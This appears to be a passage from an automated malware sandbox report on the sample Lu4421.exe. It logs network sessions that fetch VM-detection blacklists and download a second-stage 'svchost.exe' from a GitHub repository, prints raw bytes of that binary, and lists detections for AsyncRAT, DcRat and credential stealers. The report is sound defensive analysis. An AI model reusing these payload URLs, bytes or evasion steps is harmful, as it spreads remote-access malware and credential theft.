                                                                                Host: raw.githubusercontent.com
                                                                                Connection: Keep-Alive
                                                                                2024-12-18 11:07:23 UTC900INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Content-Length: 1246
                                                                                Cache-Control: max-age=300
                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                Content-Type: text/plain; charset=utf-8
                                                                                ETag: "30981a4a96ce3533cb33ae7620077db7a4a8377cb1ef8fcfc8a07293fa2937d6"
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                X-Content-Type-Options: nosniff
                                                                                X-Frame-Options: deny
                                                                                X-XSS-Protection: 1; mode=block
                                                                                X-GitHub-Request-Id: 6058:310945:9D76D7:ABD208:6762ACE8
                                                                                Accept-Ranges: bytes
                                                                                Date: Wed, 18 Dec 2024 11:07:22 GMT
                                                                                Via: 1.1 varnish
                                                                                X-Served-By: cache-ewr-kewr1740020-EWR
                                                                                X-Cache: MISS
                                                                                X-Cache-Hits: 0
                                                                                X-Timer: S1734520043.806602,VS0,VE66
                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                Access-Control-Allow-Origin: *
                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                X-Fastly-Request-ID: 40e029e2d736f144f624436975bd9d1d09a52f93
                                                                                Expires: Wed, 18 Dec 2024 11:12:22 GMT
                                                                                Source-Age: 0
                                                                                2024-12-18 11:07:23 UTC1246INData Raw: 32 39 5f 5f 48 45 52 45 0a 32 47 36 43 37 5a 36 31 0a 32 52 4f 5f 38 55 56 55 0a 32 53 4e 35 33 38 4b 34 0a 35 4b 42 4b 34 31 5f 4c 0a 35 4c 58 50 41 38 45 53 0a 35 50 45 43 4e 36 4c 31 0a 35 52 50 46 54 33 48 5a 0a 36 42 4f 53 34 4f 37 55 0a 36 42 5a 50 32 59 32 5f 0a 36 46 34 34 41 44 52 37 0a 36 4d 50 41 39 33 0a 37 32 32 39 48 39 47 39 0a 37 34 5a 5a 43 59 37 41 0a 37 54 42 39 47 36 50 37 0a 38 34 4b 44 31 4b 53 4b 0a 38 4e 59 47 4b 33 46 4c 0a 38 59 33 42 53 58 4b 47 0a 39 53 46 37 32 46 47 37 0a 39 5a 37 37 44 4e 34 54 0a 5f 47 33 31 45 34 36 4e 0a 5f 50 48 4c 4e 59 47 52 0a 5f 54 39 57 35 4c 48 4f 0a 41 46 52 42 52 36 54 43 0a 41 4d 44 20 52 61 64 65 6f 6e 20 48 44 20 38 36 35 30 47 0a 41 53 50 45 45 44 20 47 72 61 70 68 69 63 73 20 46 61 6d 69 6c
                                                                                Data Ascii: 29__HERE2G6C7Z612RO_8UVU2SN538K45KBK41_L5LXPA8ES5PECN6L15RPFT3HZ6BOS4O7U6BZP2Y2_6F44ADR76MPA937229H9G974ZZCY7A7TB9G6P784KD1KSK8NYGK3FL8Y3BSXKG9SF72FG79Z77DN4T_G31E46N_PHLNYGR_T9W5LHOAFRBR6TCAMD Radeon HD 8650GASPEED Graphics Famil


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                5192.168.2.449730185.199.108.1334436768C:\Users\user\Desktop\Lu4421.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-18 11:07:22 UTC126OUTGET /6nz/virustotal-vm-blacklist/main/processes_list.txt HTTP/1.1
                                                                                Host: raw.githubusercontent.com
                                                                                Connection: Keep-Alive
                                                                                2024-12-18 11:07:23 UTC898INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Content-Length: 31
                                                                                Cache-Control: max-age=300
                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                Content-Type: text/plain; charset=utf-8
                                                                                ETag: "b8ccbe01df84b6df59046ff7ef97fe02bbba9374a7a63f24d1c8a0b07083adca"
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                X-Content-Type-Options: nosniff
                                                                                X-Frame-Options: deny
                                                                                X-XSS-Protection: 1; mode=block
                                                                                X-GitHub-Request-Id: A8FE:1D65EC:60AA01:6AAE56:6762ACE7
                                                                                Accept-Ranges: bytes
                                                                                Date: Wed, 18 Dec 2024 11:07:22 GMT
                                                                                Via: 1.1 varnish
                                                                                X-Served-By: cache-ewr-kewr1740033-EWR
                                                                                X-Cache: MISS
                                                                                X-Cache-Hits: 0
                                                                                X-Timer: S1734520043.805342,VS0,VE74
                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                Access-Control-Allow-Origin: *
                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                X-Fastly-Request-ID: 1e52387be6d9b94197ccfb253e040ec99f49bc81
                                                                                Expires: Wed, 18 Dec 2024 11:12:22 GMT
                                                                                Source-Age: 0
                                                                                2024-12-18 11:07:23 UTC31INData Raw: 56 6d 52 65 6d 6f 74 65 47 75 65 73 74 2e 65 78 65 0a 53 79 73 6d 6f 6e 36 34 2e 65 78 65 0a
                                                                                Data Ascii: VmRemoteGuest.exeSysmon64.exe


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                6192.168.2.44973620.233.83.1454436768C:\Users\user\Desktop\Lu4421.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-18 11:07:25 UTC105OUTGET /kgnfth/tumblr/raw/refs/heads/main/svchost.exe HTTP/1.1
                                                                                Host: github.com
                                                                                Connection: Keep-Alive
                                                                                2024-12-18 11:07:25 UTC556INHTTP/1.1 302 Found
                                                                                Server: GitHub.com
                                                                                Date: Wed, 18 Dec 2024 11:07:25 GMT
                                                                                Content-Type: text/html; charset=utf-8
                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                Access-Control-Allow-Origin:
                                                                                Location: https://raw.githubusercontent.com/kgnfth/tumblr/refs/heads/main/svchost.exe
                                                                                Cache-Control: no-cache
                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                X-Frame-Options: deny
                                                                                X-Content-Type-Options: nosniff
                                                                                X-XSS-Protection: 0
                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                2024-12-18 11:07:25 UTC3380INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                7192.168.2.449737185.199.108.1334436768C:\Users\user\Desktop\Lu4421.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-12-18 11:07:27 UTC92OUTGET /kgnfth/tumblr/refs/heads/main/svchost.exe HTTP/1.1
                                                                                Host: raw.githubusercontent.com
                                                                                2024-12-18 11:07:27 UTC899INHTTP/1.1 200 OK
                                                                                Connection: close
                                                                                Content-Length: 65024
                                                                                Cache-Control: max-age=300
                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                Content-Type: application/octet-stream
                                                                                ETag: "9f76b04e02d12553ee7b428273b66996671537fc6643d70be5486cafb79a6fd4"
                                                                                Strict-Transport-Security: max-age=31536000
                                                                                X-Content-Type-Options: nosniff
                                                                                X-Frame-Options: deny
                                                                                X-XSS-Protection: 1; mode=block
                                                                                X-GitHub-Request-Id: B16E:D7775:A3CCB6:B23A74:6762ACEF
                                                                                Accept-Ranges: bytes
                                                                                Date: Wed, 18 Dec 2024 11:07:27 GMT
                                                                                Via: 1.1 varnish
                                                                                X-Served-By: cache-nyc-kteb1890072-NYC
                                                                                X-Cache: MISS
                                                                                X-Cache-Hits: 0
                                                                                X-Timer: S1734520047.463020,VS0,VE88
                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                Access-Control-Allow-Origin: *
                                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                                X-Fastly-Request-ID: e008e1c360e712f16dc00b052ed40440ad1dd749
                                                                                Expires: Wed, 18 Dec 2024 11:12:27 GMT
                                                                                Source-Age: 0
                                                                                2024-12-18 11:07:27 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 3a 83 3e 67 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 ea 00 00 00 12 00 00 00 00 00 00 0e 09 01 00 00 20 00 00 00 20 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL:>g @ `@
                                                                                2024-12-18 11:07:27 UTC1378INData Raw: 0a 2a 6e 7e 85 01 00 04 39 10 00 00 00 7e 85 01 00 04 6f 00 01 00 0a 14 80 85 01 00 04 2a 56 d0 1a 00 00 02 28 62 00 00 0a 28 91 00 00 0a 80 8a 01 00 04 2a 7e 7e 0e 00 00 04 28 1a 00 00 0a 39 0f 00 00 00 28 49 00 00 06 39 05 00 00 00 28 70 00 00 06 2a 56 72 41 1c 00 70 7e 0f 00 00 04 28 86 00 00 0a 80 8d 01 00 04 2a 5e 02 28 1c 00 00 0a 03 6f 23 00 00 0a 28 78 00 00 06 28 09 01 00 0a 2a 5e 28 1c 00 00 0a 02 03 28 1d 00 00 0a 28 7a 00 00 06 6f 1e 00 00 0a 2a 56 28 bd 00 00 0a 72 21 1d 00 70 6f 23 00 00 0a 80 94 01 00 04 2a 32 7e 99 01 00 04 02 6f 23 00 00 0a 2a 32 7e 99 01 00 04 02 6f 1e 00 00 0a 2a 32 02 28 1f 01 00 0a 28 81 00 00 06 2a 8e 1a 8d 53 00 00 01 25 19 02 d2 9c 25 18 02 1e 63 d2 9c 25 17 02 1f 10 63 d2 9c 25 16 02 1f 18 63 d2 9c 2a 4e 18 8d 53
                                                                                Data Ascii: *n~9~o*V(b(*~~(9(I9(p*VrAp~(*^(o#(x(*^(((zo*V(r!po#*2~o#*2~o*2((*S%%c%c%c*NS
                                                                                2024-12-18 11:07:27 UTC1378INData Raw: 01 00 00 01 00 00 73 00 19 8c 00 06 01 00 00 01 00 00 93 00 23 b6 00 06 01 00 00 01 00 00 bd 00 19 d6 00 06 01 00 00 01 00 00 e1 00 14 f5 00 06 01 00 00 01 00 00 fc 00 19 15 01 06 01 00 00 01 1b 30 02 00 41 01 00 00 02 00 00 11 28 1c 00 00 0a 7e 07 00 00 04 28 1d 00 00 0a 6f 1e 00 00 0a 80 07 00 00 04 7e 07 00 00 04 73 76 00 00 06 80 0c 00 00 04 7e 0c 00 00 04 7e 01 00 00 04 6f 79 00 00 06 80 01 00 00 04 7e 0c 00 00 04 7e 02 00 00 04 6f 79 00 00 06 80 02 00 00 04 7e 0c 00 00 04 7e 03 00 00 04 6f 79 00 00 06 80 03 00 00 04 7e 0c 00 00 04 7e 04 00 00 04 6f 79 00 00 06 80 04 00 00 04 7e 0c 00 00 04 7e 08 00 00 04 6f 79 00 00 06 80 08 00 00 04 7e 0c 00 00 04 7e 0d 00 00 04 6f 79 00 00 06 80 0d 00 00 04 7e 0c 00 00 04 7e 13 00 00 04 6f 79 00 00 06 80 13 00 00
                                                                                Data Ascii: s#0A(~(o~sv~~oy~~oy~~oy~~oy~~oy~~oy~~oy
                                                                                2024-12-18 11:07:27 UTC1378INData Raw: 10 27 00 00 20 98 3a 00 00 6f 38 00 00 0a 73 2d 00 00 0a 20 10 27 00 00 20 98 3a 00 00 6f 38 00 00 0a 73 40 00 00 0a 28 11 00 00 06 14 fe 06 22 00 00 06 73 3f 00 00 0a 14 17 17 73 40 00 00 0a 28 16 00 00 06 28 08 00 00 06 28 0a 00 00 06 28 0e 00 00 06 69 28 0c 00 00 06 69 14 fe 06 1f 00 00 06 73 41 00 00 0a 14 6f 42 00 00 0a 26 38 06 00 00 00 16 28 13 00 00 06 dd 0c 00 00 00 26 16 28 13 00 00 06 dd 00 00 00 00 2a 00 00 00 41 4c 00 00 00 00 00 00 ce 00 00 00 26 00 00 00 f4 00 00 00 06 00 00 00 01 00 00 01 02 00 00 00 21 01 00 00 82 00 00 00 a3 01 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e4 02 00 00 e4 02 00 00 0c 00 00 00 01 00 00 01 1b 30 02 00 6a 00 00 00 00 00 00 00 28 15 00 00 06 25 3a 06 00 00 00 26 38 05 00 00 00 28 45 00 00 0a 28 10 00
                                                                                Data Ascii: ' :o8s- ' :o8s@("s?s@((((i(isAoB&8(&(*AL&!0j(%:&8(E(
                                                                                2024-12-18 11:07:27 UTC1378INData Raw: 72 81 12 00 70 28 2b 00 00 0a 3a 25 00 00 00 07 72 8d 12 00 70 28 2b 00 00 0a 3a 60 00 00 00 07 72 9d 12 00 70 28 2b 00 00 0a 3a d9 00 00 00 38 6f 01 00 00 16 28 1a 00 00 06 73 bd 00 00 06 25 72 57 12 00 70 6f a8 00 00 06 72 81 12 00 70 6f aa 00 00 06 25 72 71 12 00 70 6f a8 00 00 06 28 17 00 00 06 6a 6f 9d 00 00 06 6f b2 00 00 06 28 20 00 00 06 16 28 18 00 00 06 38 24 01 00 00 00 06 72 b5 12 00 70 6f a8 00 00 06 6f b4 00 00 06 28 72 00 00 06 3a 54 00 00 00 7e 1f 00 00 04 06 6f 57 00 00 0a 73 bd 00 00 06 25 72 57 12 00 70 6f a8 00 00 06 72 bd 12 00 70 6f aa 00 00 06 25 72 d3 12 00 70 6f a8 00 00 06 06 72 b5 12 00 70 6f a8 00 00 06 6f b4 00 00 06 6f aa 00 00 06 6f b2 00 00 06 28 20 00 00 06 38 06 00 00 00 06 28 24 00 00 06 dd aa 00 00 00 6f 58 00 00 0a 28
                                                                                Data Ascii: rp(+:%rp(+:`rp(+:8o(s%rWporpo%rqpo(joo( (8$rpoo(r:T~oWs%rWporpo%rporpoooo( 8($oX(
                                                                                2024-12-18 11:07:27 UTC1378INData Raw: 00 00 0a 25 11 08 6f 75 00 00 0a 25 17 6f 7b 00 00 0a 25 16 6f 8b 00 00 0a 25 16 6f 8c 00 00 0a 25 17 6f 7a 00 00 0a 28 7c 00 00 0a 26 16 28 19 00 00 0a dd 1d 00 00 00 13 0a 72 b7 14 00 70 11 0a 6f 58 00 00 0a 28 86 00 00 0a 28 26 00 00 06 dd 00 00 00 00 2a 41 64 00 00 00 00 00 00 51 00 00 00 28 00 00 00 79 00 00 00 06 00 00 00 01 00 00 01 02 00 00 00 16 01 00 00 2c 00 00 00 42 01 00 00 0f 00 00 00 00 00 00 00 02 00 00 00 b5 01 00 00 6c 00 00 00 21 02 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6a 02 00 00 6a 02 00 00 1d 00 00 00 41 00 00 01 1b 30 02 00 32 00 00 00 00 00 00 00 16 28 2b 00 00 06 7e 21 00 00 04 6f 8e 00 00 0a 14 fe 06 2e 00 00 06 73 8f 00 00 0a 73 90 00 00 0a 80 21 00 00 04 dd 06 00 00 00 26 dd 00 00 00 00 2a 00 00 01 10 00 00 00
                                                                                Data Ascii: %ou%o{%o%o%oz(|&(rpoX((&*AdQ(y,Bl!jjA02(+~!o.ss!&*
                                                                                2024-12-18 11:07:27 UTC1378INData Raw: 10 00 00 11 1b 8d 01 00 00 01 25 16 28 b4 00 00 0a 8c 8a 00 00 01 a2 25 17 28 b5 00 00 0a a2 25 18 28 94 00 00 0a a2 25 19 28 b6 00 00 0a a2 25 1a 28 b7 00 00 0a 28 b8 00 00 0a 73 b9 00 00 0a 28 ba 00 00 0a 8c 8d 00 00 01 a2 28 bb 00 00 0a 0a 73 bc 00 00 0a 28 bd 00 00 0a 06 6f 23 00 00 0a 0b 07 6f 24 00 00 0a 0b 73 be 00 00 0a 0c 07 0d 16 13 04 38 1f 00 00 00 09 11 04 91 13 05 08 12 05 72 29 18 00 70 28 bf 00 00 0a 6f c0 00 00 0a 26 11 04 17 58 13 04 11 04 09 8e 69 32 da 08 6f 3d 00 00 0a 16 1f 14 6f c1 00 00 0a 6f c2 00 00 0a 13 06 dd 0d 00 00 00 26 72 2f 18 00 70 13 06 dd 00 00 00 00 11 06 2a 00 00 00 01 10 00 00 00 00 00 00 b5 b5 00 0d 01 00 00 01 13 30 07 00 d7 01 00 00 11 00 00 11 73 bd 00 00 06 25 72 57 12 00 70 6f a8 00 00 06 72 41 18 00 70 6f b5
                                                                                Data Ascii: %(%(%(%(%((s((s(o#o$s8r)p(o&Xi2o=oo&r/p*0s%rWporApo
                                                                                2024-12-18 11:07:27 UTC1378INData Raw: 17 6f e1 00 00 0a 72 55 1a 00 70 6f e2 00 00 0a dd 06 00 00 00 26 dd 00 00 00 00 00 7e 7d 00 00 0a 72 33 1a 00 70 17 6f e1 00 00 0a 72 45 1a 00 70 17 6f e1 00 00 0a 72 65 1a 00 70 6f e2 00 00 0a dd 06 00 00 00 26 dd 00 00 00 00 2a 00 01 28 00 00 00 00 00 00 36 36 00 06 01 00 00 01 00 00 3d 00 2a 67 00 06 01 00 00 01 00 00 6e 00 2a 98 00 06 01 00 00 01 1b 30 03 00 68 00 00 00 16 00 00 11 28 6d 00 00 0a 6f e5 00 00 0a 6f e6 00 00 0a 0a 38 2a 00 00 00 06 6f 01 00 00 0a 74 1b 00 00 01 0b 07 6f e7 00 00 0a 02 17 28 e8 00 00 0a 3a 0c 00 00 00 07 6f e9 00 00 0a 0c dd 27 00 00 00 06 6f 02 00 00 0a 2d ce dd 14 00 00 00 06 75 40 00 00 01 0d 09 39 06 00 00 00 09 6f 27 00 00 0a dc 7e ad 00 00 0a 2a 08 2a 01 10 00 00 02 00 10 00 3c 4c 00 14 00 00 00 00 1b 30 04 00 f5
                                                                                Data Ascii: orUpo&~}r3porEporepo&*(66=*gn*0h(moo8*oto(:o'o-u@9o'~**<L0
                                                                                2024-12-18 11:07:27 UTC1378INData Raw: 11 0a 11 06 3f 62 ff ff ff dd 0c 00 00 00 26 72 c3 1a 00 70 73 f1 00 00 0a 7a 06 7e ad 00 00 0a 28 e3 00 00 0a 39 11 00 00 00 03 72 c3 1b 00 70 28 86 00 00 0a 73 f2 00 00 0a 7a 06 2a 00 00 00 41 1c 00 00 00 00 00 00 06 00 00 00 c0 01 00 00 c6 01 00 00 0c 00 00 00 01 00 00 01 1b 30 05 00 98 00 00 00 19 00 00 11 73 66 00 00 06 0a 06 03 7d 84 01 00 04 15 73 f5 00 00 0a 28 6d 00 00 0a 6f e5 00 00 0a 28 04 00 00 2b 06 fe 06 67 00 00 06 73 f7 00 00 0a 28 05 00 00 2b 28 06 00 00 2b 6f e9 00 00 0a 04 28 5e 00 00 06 0b 12 02 02 8e 69 28 f5 00 00 0a 16 0d 12 01 12 02 1f 40 12 03 28 57 00 00 06 26 02 16 07 02 8e 69 28 fa 00 00 0a dd 29 00 00 00 13 04 72 db 1b 00 70 11 04 6f 58 00 00 0a 28 fb 00 00 0a 72 db 1b 00 70 11 04 6f fc 00 00 0a 28 fb 00 00 0a dd 00 00 00 00
                                                                                Data Ascii: ?b&rpsz~(9rp(sz*A0sf}s(mo(+gs(+(+o(^i(@(W&i()rpoX(rpo(
                                                                                2024-12-18 11:07:27 UTC1378INData Raw: 0a 07 18 6f 10 01 00 0a 07 02 7b 92 01 00 04 6f 11 01 00 0a 07 6f 12 01 00 0a 06 07 6f 13 01 00 0a 17 73 14 01 00 0a 0c 06 07 6f 15 01 00 0a 16 07 6f 15 01 00 0a 8e 69 6f 51 00 00 0a 08 03 16 03 8e 69 6f 51 00 00 0a 08 6f 16 01 00 0a 02 7b 93 01 00 04 73 17 01 00 0a 0d 09 06 6f 18 01 00 0a 1f 20 06 6f 18 01 00 0a 8e 69 1f 20 59 6f 19 01 00 0a 13 04 06 16 6a 6f 53 00 00 0a 06 11 04 16 11 04 8e 69 6f 51 00 00 0a dd 27 00 00 00 09 39 06 00 00 00 09 6f 27 00 00 0a dc 08 39 06 00 00 00 08 6f 27 00 00 0a dc 07 39 06 00 00 00 07 6f 27 00 00 0a dc 06 6f 18 01 00 0a 13 05 dd 0d 00 00 00 06 39 06 00 00 00 06 6f 27 00 00 0a dc 11 05 2a 00 00 00 01 34 00 00 02 00 9c 00 35 d1 00 0d 00 00 00 00 02 00 6a 00 74 de 00 0d 00 00 00 00 02 00 26 00 c5 eb 00 0d 00 00 00 00 02
                                                                                Data Ascii: o{ooosooioQioQo{so oi YojoSioQ'9o'9o'9o'o9o'*45jt&


                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Target ID:0
                                                                                Start time:06:07:17
                                                                                Start date:18/12/2024
                                                                                Path:C:\Users\user\Desktop\Lu4421.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\Desktop\Lu4421.exe"
                                                                                Imagebase:0xb50000
                                                                                File size:5'865'472 bytes
                                                                                MD5 hash:E5358FCA58C0E1B1E29EB195FB0F4675
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_AntiVM_5, Description: Yara detected AntiVM_5, Source: 00000000.00000002.2043697205.0000015B64320000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000002.2043697205.0000015B6457E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AntiVM_5, Description: Yara detected AntiVM_5, Source: 00000000.00000002.2043697205.0000015B648AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.2043697205.0000015B642B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AntiVM_5, Description: Yara detected AntiVM_5, Source: 00000000.00000002.2043697205.0000015B642B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_DcRat_2, Description: Yara detected DcRat, Source: 00000000.00000002.2043697205.0000015B64432000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Stealerium, Description: Yara detected Stealerium, Source: 00000000.00000000.1697706505.0000000000B52000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000000.1697706505.0000000000B52000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.1697706505.0000000000B52000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_AntiVM_5, Description: Yara detected AntiVM_5, Source: 00000000.00000000.1697706505.0000000000B52000.00000080.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000000.00000000.1697706505.0000000000B52000.00000080.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:1
                                                                                Start time:06:07:27
                                                                                Start date:18/12/2024
                                                                                Path:C:\Users\user\AppData\Local\Temp\svchost.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\svchost.exe"
                                                                                Imagebase:0xdd0000
                                                                                File size:65'024 bytes
                                                                                MD5 hash:67CA41C73D556CC4CFC67FC5B425BBBD
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_DcRat_2, Description: Yara detected DcRat, Source: 00000001.00000002.2947120168.000000000371F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000001.00000002.2947120168.000000000371F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000001.00000002.2954256856.000000001BB00000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000001.00000000.1789131425.0000000000DD2000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000001.00000002.2946463897.0000000001288000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000001.00000002.2946578084.00000000012AD000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_DcRat_2, Description: Yara detected DcRat, Source: 00000001.00000002.2947120168.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000001.00000002.2947120168.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_DcRat_2, Description: Yara detected DcRat, Source: 00000001.00000002.2947120168.000000000323E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000001.00000002.2947120168.000000000323E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: Joe Security
                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice, Description: Detects executables attemping to enumerate video devices using WMI, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: ditekSHen
                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy, Description: Detects executables containing the string DcRatBy, Source: C:\Users\user\AppData\Local\Temp\svchost.exe, Author: ditekSHen
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Avira
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                • Detection: 84%, ReversingLabs
                                                                                Reputation:low
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:4
                                                                                Start time:06:07:27
                                                                                Start date:18/12/2024
                                                                                Path:C:\Windows\System32\WerFault.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\WerFault.exe -u -p 6768 -s 2944
                                                                                Imagebase:0x7ff783d80000
                                                                                File size:570'736 bytes
                                                                                MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:14.4%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:23%
                                                                                  Total number of Nodes:87
                                                                                  Total number of Limit Nodes:4
